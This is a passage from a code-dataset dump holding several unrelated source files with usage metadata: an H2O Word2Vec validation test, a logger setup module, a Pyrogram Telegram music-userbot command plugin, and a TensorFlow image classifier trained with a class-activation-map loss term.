"usage_type": "call"}, {"api_name": "torch.long", "line_number": 60, "usage_type": "attribute"}, {"api_name": "einops.repeat", "line_number": 80, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 64, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 111, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.cosine_similarity", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 128, "usage_type": "call"}, {"api_name": "priorityQueue.priorityQueue_torch", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 165, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 168, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.scatter", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.vstack", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.isinf", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.full_like", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.isinf", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.full_like", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 191, "usage_type": "call"}, {"api_name": "einops.repeat", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 269, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 269, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 276, "usage_type": "name"}, {"api_name": "torch.einsum", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 283, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 290, "usage_type": "attribute"}]} +{"seq_id": "13350670654", "text": "import h2o\nfrom h2o.exceptions import H2OValueError\n\nfrom tests import pyunit_utils\nfrom h2o.estimators.word2vec import H2OWord2vecEstimator\n\n\ndef pubdev_5112():\n words = h2o.create_frame(rows=10, cols=1, string_fraction=1.0, missing_fraction=0.0)\n embeddings = h2o.create_frame(rows=10, cols=100, real_fraction=1.0, missing_fraction=0.0)\n word_embeddings = words.cbind(embeddings)\n\n w2v_model = H2OWord2vecEstimator.from_external(external=word_embeddings)\n\n model_id = w2v_model.model_id\n model = h2o.get_model(model_id)\n\n assert model, \"Worder2Vec model without a training frame was retrieved\"\n\n # Only leading column should be of type String\n leading_column_string_error = False\n try:\n string_frame = h2o.create_frame(rows=10, cols=10, real_fraction=1.0, missing_fraction=0.0)\n H2OWord2vecEstimator.from_external(external=string_frame)\n except H2OValueError:\n leading_column_string_error = True\n\n assert leading_column_string_error, \"Word2Vec pre-trained model should be checked for the leading column\" \\\n \" to be string\"\n # Other columns should be non-string type\n multiple_string_columns_error = False\n try:\n string_frame = h2o.create_frame(rows=10, cols=10, string_fraction=1.0, missing_fraction=0.0)\n H2OWord2vecEstimator.from_external(external=string_frame)\n except H2OValueError:\n multiple_string_columns_error = True\n\n assert multiple_string_columns_error, \"Word2Vec pre-trained model should be checked for columns not to have a\" \\\n \" String type except for the leading column\"\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pubdev_5112)\nelse:\n pubdev_5112()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_jira/pyunit_pubdev_5112.py", "file_name": "pyunit_pubdev_5112.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "h2o.create_frame", "line_number": 9, "usage_type": "call"}, {"api_name": "h2o.create_frame", "line_number": 10, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator.from_external", "line_number": 13, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator", "line_number": 13, "usage_type": "name"}, {"api_name": "h2o.get_model", "line_number": 16, "usage_type": "call"}, {"api_name": "h2o.create_frame", "line_number": 23, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator.from_external", "line_number": 24, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator", "line_number": 24, "usage_type": "name"}, {"api_name": "h2o.exceptions.H2OValueError", "line_number": 25, "usage_type": "name"}, {"api_name": "h2o.create_frame", "line_number": 33, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator.from_external", "line_number": 34, "usage_type": "call"}, {"api_name": "h2o.estimators.word2vec.H2OWord2vecEstimator", "line_number": 34, "usage_type": "name"}, {"api_name": "h2o.exceptions.H2OValueError", "line_number": 35, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 42, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "7962417730", "text": "from activecampaign3.config import CONFIG\nimport logging\nimport os\n\nlogsdir = CONFIG['logs']['dir']\nlog_level = getattr(logging, CONFIG['logs']['level'].upper())\n\nlogger = logging.getLogger(\"activecampaign3\")\nos.makedirs(logsdir, exist_ok=True)\nlogfilepath = os.path.join(logsdir, CONFIG['logs']['file'])\nh = logging.FileHandler(logfilepath)\nh.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nh.setFormatter(formatter)\nlogger.addHandler(h)\nlogger.setLevel(log_level)\n\nlogger.info(\"log init\")\n", "repo_name": "batsimprov/activecampaign3", "sub_path": "activecampaign3/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "activecampaign3.config.CONFIG", "line_number": 5, "usage_type": "name"}, {"api_name": "activecampaign3.config.CONFIG", "line_number": 6, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "activecampaign3.config.CONFIG", "line_number": 10, "usage_type": "name"}, {"api_name": "logging.FileHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "74321602753", "text": "import os\nimport sys\nfrom datetime import datetime\nfrom time import time\n\nfrom pyrogram import Client, filters\nfrom pyrogram.types import Message\n\nfrom config import HNDLR, SUDO_USERS\n\n# System Uptime\nSTART_TIME = datetime.utcnow()\nTIME_DURATION_UNITS = (\n (\"Minggu\", 60 * 60 * 24 * 7),\n (\"Hari\", 60 * 60 * 24),\n (\"Jam\", 60 * 60),\n (\"Menit\", 60),\n (\"Detik\", 1),\n)\n\n\nasync def _human_time_duration(seconds):\n if seconds == 0:\n return \"inf\"\n parts = []\n for unit, div in TIME_DURATION_UNITS:\n amount, seconds = divmod(int(seconds), div)\n if amount > 0:\n parts.append(\"{} {}{}\".format(amount, unit, \"\" if amount == 1 else \"\"))\n return \", \".join(parts)\n\n\n@Client.on_message(filters.command([\"ping\"], prefixes=f\"{HNDLR}\"))\nasync def ping(client, m: Message):\n await m.delete()\n start = time()\n current_time = datetime.utcnow()\n m_reply = await m.reply_text(\"⚡\")\n delta_ping = time() - start\n uptime_sec = (current_time - START_TIME).total_seconds()\n uptime = await _human_time_duration(int(uptime_sec))\n await m_reply.edit(\n f\"🏓 PONG `{delta_ping * 1000:.3f} ms` \\n⏳ AKTIF - `{uptime}`\"\n )\n\n\n@Client.on_message(\n filters.user(SUDO_USERS) & filters.command([\"restart\"], prefixes=f\"{HNDLR}\")\n)\nasync def restart(client, m: Message):\n await m.delete()\n loli = await m.reply(\"1\")\n await loli.edit(\"2\")\n await loli.edit(\"3\")\n await loli.edit(\"4\")\n await loli.edit(\"5\")\n await loli.edit(\"6\")\n await loli.edit(\"7\")\n await loli.edit(\"8\")\n await loli.edit(\"9\")\n await loli.edit(\"**✅ Userbot Di Mulai Ulang**\")\n os.execl(sys.executable, sys.executable, *sys.argv)\n quit()\n\n\n@Client.on_message(filters.command([\"help\"], prefixes=f\"{HNDLR}\"))\nasync def help(client, m: Message):\n await m.delete()\n HELP = f\"\"\"\n👋 Hallo {m.from_user.mention}!\n\n🛠 MENU BANTUAN\n\n⚡ PERINTAH UNTUK SEMUA ORANG\n• {HNDLR}play [judul lagu | link youtube | balas file audio] - untuk memutar lagu\n• {HNDLR}vplay [judul video | link youtube | balas file video] - untuk memutar video\n• {HNDLR}playlist untuk melihat daftar putar\n• {HNDLR}ping - untuk cek status\n• {HNDLR}help - untuk melihat daftar perintah\n\n⚡ PERINTAH UNTUK SEMUA ADMIN\n• {HNDLR}resume - untuk melanjutkan pemutaran lagu atau video\n• {HNDLR}pause - untuk untuk menjeda pemutaran lagu atau video\n• {HNDLR}skip - untuk melewati lagu atau video\n• {HNDLR}end - untuk mengakhiri pemutaran\n\"\"\"\n await m.reply(HELP)\n\n\n@Client.on_message(filters.command([\"repo\"], prefixes=f\"{HNDLR}\"))\nasync def repo(client, m: Message):\n await m.delete()\n REPO = f\"\"\"\n👋 Hallo {m.from_user.mention}!\n\n🎶 Music Dan Video Player UserBot\n\n🤖 Telegram UserBot Untuk Memutar Lagu Dan Video Di Obrolan Suara Telegram.\n\n✨ Dipersembahkan Oleh \n• [PyTgCalls](https://github.com/pytgcalls/pytgcalls)\n• [Pyrogram](https://github.com/pyrogram/pyrogram)\n\n\n📝 Persyaratan\n• Python 3.8+\n• FFMPEG\n• Nodejs v16+\n\n🛠 MENU BANTUAN\n\n⚡ PERINTAH UNTUK SEMUA ORANG\n• `/play [judul lagu | link youtube | balas file audio]` - untuk memutar lagu\n• `/vplay [judul video | link youtube | balas file video]` - untuk memutar video\n• `/playlist` untuk melihat daftar putar\n• `/ping` - untuk cek status\n• `/help` - untuk melihat daftar perintah\n\n⚡ PERINTAH UNTUK SEMUA ADMIN\n• `/resume` - untuk melanjutkan pemutaran lagu atau video\n• `/pause` - untuk untuk menjeda pemutaran lagu atau video\n• `/skip` - untuk melewati lagu atau video\n• `/end` - untuk mengakhiri pemutaran\n\n💡 Deployment\n\n💜 Heroku\n\n [𝗗𝗘𝗣𝗟𝗢𝗬 𝗞𝗘 𝗛𝗘𝗥𝗢𝗞𝗨](https://heroku.com/deploy?template=https://github.com/XtomiSN/MusicAndVideoPlayer)\n\n📚 Variabel Yang Dibutuhkan\n• `API_ID` - Dapatkan Dari [my.telegram.org](https://my.telegram.org)\n• `API_HASH` - Dapatkan Dari [my.telegram.org](https://my.telegram.org)\n• `SESSION` - Sesi String Pyrogram. Dapatkan String Dari [Sini](https://replit.com/@GoodBoysExe/string-session?lite=1&outputonly=1)\n• `SUDO_USER` - ID Akun Telegram Yang Digunakan Sebagai Admin\n\n\n🔥 KREDIT \n• [Dan](https://github.com/delivrance) untuk [Pyrogram](https://github.com/pyrogram/pyrogram)\n• [Laky](https://github.com/Laky-64) untuk [PyTgCalls](https://github.com/pytgcalls/pytgcalls)\n\"\"\"\n await m.reply(REPO, disable_web_page_preview=True)\n", "repo_name": "XtomiSN/MusicAndVideoPlayer", "sub_path": "MusicAndVideo/userbot.py", "file_name": "userbot.py", "file_ext": "py", "file_size_in_byte": 4416, "program_lang": "python", "lang": "id", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 34, "usage_type": "name"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 33, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 33, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 33, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 33, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 50, "usage_type": "name"}, {"api_name": "os.execl", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pyrogram.Client.on_message", "line_number": 47, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 47, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 48, "usage_type": "call"}, {"api_name": "config.SUDO_USERS", "line_number": 48, "usage_type": "argument"}, {"api_name": "pyrogram.filters", "line_number": 48, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 48, "usage_type": "call"}, {"api_name": "config.HNDLR", "line_number": 48, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 67, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 75, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 76, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 77, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 78, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 79, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 82, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 83, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 84, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 85, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 66, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 66, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 66, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 66, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 66, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 91, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 90, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 90, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 90, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 90, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "73138184193", "text": "import pickle\n\nimport tensorflow as tf\nfrom datasets.dataset import Dataset\nfrom datasets.cifar10_data import Cifar10_Dataset\nfrom datasets.imagenet_data import Imagenet_Dataset\nfrom utils import show_graph, save_graph_txt\n\nfrom classification_models.classification_model import Abstract_model\n\nslim = tf.contrib.slim\nfrom tensorflow.contrib.layers.python.layers import layers as layers_lib\nfrom tensorflow.contrib.layers.python.layers import utils\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.contrib import layers\nfrom tensorflow.contrib.framework.python.ops import arg_scope\nimport numpy as np\nimport cv2\n\ndef get_slim_arch_bn(inputs, isTrainTensor, num_classes=1000, scope='vgg_16'):\n with variable_scope.variable_scope(scope, 'vgg_16', [inputs]) as sc:\n end_points_collection = sc.original_name_scope + '_end_points'\n # Collect outputs for conv2d, fully_connected and max_pool2d.\n\n filters = 64\n\n # Arg scope set default parameters for a list of ops\n with arg_scope([layers.conv2d, layers_lib.fully_connected,\n layers_lib.max_pool2d],\n outputs_collections=end_points_collection):\n net = layers_lib.repeat(inputs, 2, layers.conv2d, filters, [3, 3],\n scope='conv1',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_0 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn1', decay=0.9)\n p_0 = layers_lib.max_pool2d(bn_0, [2, 2], scope='pool1')\n\n net = layers_lib.repeat(p_0, 2, layers.conv2d, filters, [3, 3],\n scope='conv2',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_1 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn2', decay=0.9)\n res_1 = p_0 + bn_1\n p_1 = layers_lib.max_pool2d(res_1, [2, 2], scope='pool2')\n\n net = layers_lib.repeat(p_1, 3, layers.conv2d, filters, [4, 4],\n scope='conv3',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_2 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn3', decay=0.9)\n res_2 = p_1 + bn_2\n p_2 = layers_lib.max_pool2d(res_2, [2, 2], scope='pool3')\n\n net = layers_lib.repeat(p_2, 3, layers.conv2d, filters, [5, 5],\n scope='conv4',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_3 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn4', decay=0.9)\n res_3 = p_2 + bn_3\n p_3 = layers_lib.max_pool2d(res_3, [2, 2], scope='pool4')\n\n last_conv = net = layers_lib.repeat(p_3, 3, layers.conv2d, filters,\n [5, 5], scope='conv5',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n\n # Here we have 14x14 filters\n net = tf.reduce_mean(net, [1, 2]) # Global average pooling\n\n # add layer with float 32 mask of same shape as global average pooling out\n # feed default with ones, leave placeholder\n\n mask = tf.placeholder_with_default(tf.ones_like(net),\n shape=net.shape, name='gap_mask')\n net = tf.multiply(net, mask)\n\n net = layers_lib.fully_connected(net, num_classes,\n activation_fn=None,\n biases_initializer=None,\n scope='softmax_logits')\n\n with tf.variable_scope(\"raw_CAM\"):\n w_tensor_name = \"vgg_16/softmax_logits/weights:0\"\n s_w = tf.get_default_graph().get_tensor_by_name(w_tensor_name)\n softmax_weights = tf.expand_dims(tf.expand_dims(s_w, 0),\n 0) # reshape to match 1x1xFxC\n # tensor mult from (N x lh x lw x F) , (1 x 1 x F x C)\n cam = tf.tensordot(last_conv, softmax_weights, [[3], [2]],\n name='cam_out')\n\n # Convert end_points_collection into a end_point dict.\n end_points = utils.convert_collection_to_dict(end_points_collection)\n return net, end_points\n\n\nclass imagenet_classifier_cam_loss_AUTO(Abstract_model):\n\n def __init__(self, dataset: Dataset, debug=False,\n name='imagenet_classifier',fixed_mask_file=None):\n super().__init__(dataset, debug, name)\n\n self.reg_factor = 0.1\n self.lr = 0.0001\n\n if fixed_mask_file:\n with open(fixed_mask_file, 'rb') as f:\n t = pickle.load(f)['masks']\n self.fixed_mask_file = {k : (None,t[k]) for k in t}\n\n\n def prepare_feed(self, is_train=False, debug=False):\n if not hasattr(self,'fixed_mask') or (self.fixed_mask_file is None):\n return super().prepare_feed(is_train=is_train,debug=debug)\n\n else:\n use_simple_index=False\n base_fd = super().prepare_feed(is_train=is_train, debug=True)\n ex_input = base_fd['model_input:0']\n\n conv_acts, indexs = self.sess.run([self.last_conv, 'indexs_input:0'],base_fd)\n\n batch_size = ex_input.shape[0]\n h, w, c = conv_acts.shape[1], conv_acts.shape[2], conv_acts.shape[3]\n\n base_cam_mask = np.zeros((batch_size, h, w))\n\n for i in range(len(indexs)):\n ind_img = indexs[i].decode('utf-8') if not use_simple_index else indexs[i].decode('utf-8').split('__')[1]\n if ind_img in self.fixed_mask_file:\n sel_cam, current_mask = self.fixed_mask_file[ind_img]\n down_sampled = cv2.resize(current_mask.astype(np.float32),\n (14, 14))\n base_cam_mask[i] = down_sampled\n\n base_fd['cam_loss_term/cam_mask:0'] = base_cam_mask\n\n return base_fd\n pass\n\n def get_feed_dict(self, isTrain):\n return {\"phase:0\": isTrain}\n\n def define_arch(self):\n phase = tf.placeholder(tf.bool, name='phase')\n\n # Define the model:\n predictions, acts = get_slim_arch_bn(self.input_l, phase,\n self.dataset.shape_target[0])\n\n self.global_step = tf.Variable(0, trainable=False,name='gstp')\n\n\n # Configure values for visualization\n\n self.last_conv = acts['vgg_16/conv5/conv5_3']\n self.softmax_weights = r\"vgg_16/softmax_logits/weights:0\"\n self.pred = tf.nn.softmax(predictions, name='prediction')\n self.cam_out = self.graph.get_tensor_by_name('vgg_16/raw_CAM/cam_out:0')\n\n with tf.variable_scope(\"cam_loss_term\"):\n\n sq_cam = tf.squeeze(self.cam_out, axis=[3, 4]) # N x hl x wl x C\n\n # selecciono solamente CAM del PREDICHO N x hl x wl x 1\n sel_index = tf.cast(tf.argmax(self.pred, axis=1), tf.int32)\n sel_index = tf.stack([tf.range(tf.shape(sq_cam)[0]), sel_index],\n axis=1, name='selected_index')\n\n # esto es algo complejo pero lo unico que hace es seleccionar por canal el del indice\n selected_cam = tf.gather_nd(tf.transpose(sq_cam, perm=[0, 3, 1, 2]),\n sel_index, name='selected_cam')\n\n act_layer = selected_cam\n\n # calc mask\n def e(t):\n return tf.expand_dims(t,axis=-1)\n res = e(e(e(tf.reduce_max(act_layer, axis=[1,2]))))\n cam_mask = tf.cast(act_layer > (res * 0.6), tf.float32)\n\n\n\n masked_cam = tf.multiply(act_layer,cam_mask,name='masked_cam')\n\n sum_per_filder = tf.reduce_sum(masked_cam,axis=(1,2))\n acts_per_mask = tf.expand_dims(tf.reduce_sum(cam_mask,axis=(1,2)) + 1 , axis=-1) # add one to avoid divide by zero when no mask\n\n real_prob = tf.reduce_sum(self.targets * self.pred,axis=1)\n self.act_term = tf.reduce_mean(sum_per_filder / tf.squeeze(acts_per_mask), axis=1)\n\n self.act_loss_term = self.act_term * tf.pow(0.2, real_prob/0.7)\n\n\n self.use_switch = tf.placeholder_with_default(tf.zeros_like(self.act_loss_term) ,self.act_loss_term.shape,'use_cam_loss' ) # if 1 use else dont use\n\n self.mean_act_loss_term = tf.reduce_mean(tf.multiply(self.act_loss_term, self.use_switch) )\n\n with tf.variable_scope(\"ce_term\"):\n ce_term = tf.losses.softmax_cross_entropy(self.targets,predictions)\n\n self.loss = ce_term + self.mean_act_loss_term\n\n\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train_step = tf.train.AdamOptimizer(\n learning_rate=self.lr).minimize(self.loss,global_step=self.global_step)\n\n # get accuracy\n prediction = tf.argmax(predictions, 1)\n equality = tf.equal(prediction, tf.argmax(self.targets, 1))\n self.accuracy = tf.reduce_mean(tf.cast(equality, tf.float32))\n\n\n\nif __name__ == \"__main__\":\n from datasets.quickdraw_dataset import QuickDraw_Dataset\n with tf.Session().as_default() as sess:\n t = QuickDraw_Dataset(1, 60,data_folder='./temp/quickdraw_expanded_images')\n\n with imagenet_classifier_cam_loss_AUTO(t, debug=False) as model:\n model.train(save_model=False)\n", "repo_name": "aferral/mejora_clasificador_feedback_CAM", "sub_path": "classification_models/imagenet_subset_cam_loss_auto.py", "file_name": "imagenet_subset_cam_loss_auto.py", "file_ext": "py", "file_size_in_byte": 10347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow.contrib", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.python.ops.variable_scope.variable_scope", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.python.ops.variable_scope", "line_number": 21, "usage_type": "name"}, {"api_name": "tensorflow.contrib.framework.python.ops.arg_scope", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.fully_connected", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 29, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 31, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 31, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 38, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 48, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 58, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 60, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 60, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 68, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 70, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 70, "usage_type": "name"}, {"api_name": "tensorflow.reduce_mean", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.ones_like", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.fully_connected", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 85, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.tensordot", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.utils.convert_collection_to_dict", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.utils", "line_number": 100, "usage_type": "name"}, {"api_name": 